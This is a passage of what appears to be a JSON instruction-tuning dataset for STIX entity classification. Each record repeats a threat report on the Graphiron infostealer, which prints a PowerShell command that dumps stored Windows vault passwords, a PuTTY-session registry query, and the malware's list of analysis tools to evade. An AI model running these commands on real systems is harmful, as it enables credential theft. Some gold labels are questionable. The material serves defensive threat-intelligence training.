\"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nProxifier\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMicrosoft\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidaw\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nx64dbg\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ntcpvcon\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", 